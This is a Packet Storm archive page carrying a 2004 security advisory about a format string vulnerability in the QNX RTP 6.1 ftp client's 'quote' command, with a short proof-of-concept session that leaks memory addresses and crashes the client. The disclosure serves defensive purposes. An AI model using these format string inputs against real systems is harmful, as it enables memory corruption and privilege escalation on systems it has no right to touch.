exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

qnx-rtp610_ftp.txt

qnx-rtp610_ftp.txt
Posted Sep 13, 2004
Authored by Julio Cesar Fort | Site rfdslabs.com.br

The QNX FTP client is susceptible to a format string attack.

tags | advisory
SHA-256 | 54dbf220789cb41ca47430f8e654f569abfc0cc3ba2d95fd72f40e340ff4ce8d
Download | Favorite | View

qnx-rtp610_ftp.txt

Change Mirror Download
                *** rfdslabs security advisory ***

Title: QNX ftp client format string bug [RLSA_03-2004]
Versions: QNX RTP 6.1 (possibly others)
Vendor: https://www.qnx.com
Date: 13 Sep 2004

Author: Julio Cesar Fort <julio at rfdslabs com br>


1. Introduction

   "QNX Software Systems has provided OS technology, development tools, and pro-
fessional services to companies building mission-critical embedded systems.
Since 1980 manufacturers have relied on QNX OS technology to power their missioncritical applications - everything from medical instruments and Internet
routers to telematics devices, 9-1-1 call centers, process control applications
and air traffic control systems. Small or large, simple or distributed, these
systems share an unmatched reputation for operating 24 hours a day, 365 days a
year, nonstop." (from https://www.qnx.com/products/rtos)


2. Details

   QNX 6.1 ftp client is vulnerable to a format string in 'quote' command.
If sucessfuly exploited, memory corruption occours and attackers can obtain
'bin' group priviledges. This kind of priviledge can be useful for backdooring
purposes, as an evil example.

# ftp 127.0.0.1
Connected to 127.0.0.1.
220 sandimas FTP server (Version 5.60) ready.
Name (127.0.0.1:root): sandimas
331 Password required for sandimas.
Password:
230 User sandimas logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote site exec "%p.%p.%p.%p"
500 'SITE EXEC 805b730.0.0.805b180': command not understood.
ftp> quote "%s.%s.%s.%s"
Memory fault (core dumped)
#


3. Solution

   QNX Software Systems was contacted in september 8th but vendor didn't reply.
It seems they don't care much about security (they don't even have a security
staff e-mail, but SALES e-mail adddress is everywhere at qnx.com!).


4. Timeline

15 Aug 2004: Vulnerability detected;
08 Sep 2004: rfdslabs contacts QNX: no success;

Thanks to DataStorm Technologies and some stranger in mobius.qnx.com who was
intersted in rfdslabs.com.br.

www.rfdslabs.com.br - computers, sex, humand mind and more
Recife, PE, Brazil
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close